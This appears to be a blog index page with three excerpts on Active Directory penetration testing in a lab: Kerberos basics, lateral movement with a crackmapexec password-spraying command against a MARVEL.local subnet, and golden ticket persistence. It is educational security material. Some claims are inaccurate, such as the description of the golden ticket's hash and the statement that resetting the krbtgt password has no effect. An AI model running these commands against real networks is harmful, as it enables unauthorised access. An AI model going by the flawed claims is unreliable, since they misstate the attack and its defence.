Understanding Kerberos

Kerberos is a network authentication protocol that runs on Windows Server, which enables clients to authenticate on the network and access services within the Windows domain. Kerberos provides single sign-on (SSO), which allows a user to authenticate once on a network and access resources without having to re-enter their user credentials each time they need to access a new resource, such as a mapped network drive. Kerberos supports delegated authentication, which allows a service running on a client’s computer to act on behalf of the authenticated domain user when it connects to other services on the network. Kerberos supports interoperability, which allows a Windows-based operating system to work in other networks that also use Kerberos as their authentication mechanism. When using Kerberos on a network, it supports mutual authentication, which allows two devices to validate the identity of each other. ...

November 24, 2025 · 5 min · 954 words · 0x-s0M3n4th

Attacking Active Directory

We will perform various Lateral movement and vertical movement . Vertical movement allows a penetration tester to escalate their privileges within a network, as compared to lateral movement, which focuses on using the same user privileges across multiple systems on the network. Lateral movement with crackmapexec: Power on kali, THEPUNISHER, Windows server 2022 . We will perform a pass the password attack using the password of the user fcastle across the entire domain. Make sure you have installed crackmapexec on your kali. Use the following command: crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 crackmapexec performs SMB enumeration on the targeted network using the creds. Then it uses pwn3d syntax to show that the machine has been affected using the username and password 2. Retrieving the SAM database from the windows devices across the domain using the following command: ...

November 24, 2025 · 4 min · 769 words · 0x-s0M3n4th

Domain Dominance and Persistence

ON THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES 1. GOLDEN TICKET , 2. SILVER TICKET AND 3. SKELETON KEY GOLDEN TICKET: A golden ticket is a special token that is created by penetration testers using the Security Identifier (SID) of the domain, the domain name, and the NTLMv1 hash of the Kerberos TGT. The golden ticket allows a penetration tester to gain access to any device within the domain by performing PTT(Pass The Ticket). This is possible because the golden ticket is encrypted using the hash of the Kerberos TGT account, which is the built-in krbtgt account on Active Directory. However, the golden ticket is not digitally signed by the krbtgt account hash but is encrypted only. This golden ticket allows anyone to impersonate any user with the privileges associated with the impersonated user on systems within the domain. To make this type of attack even more awesome, imagine that changing the password for the krbtgt account has zero effect on mitigating this attack on Active Directory. ...

November 24, 2025 · 4 min · 844 words · 0x-s0M3n4th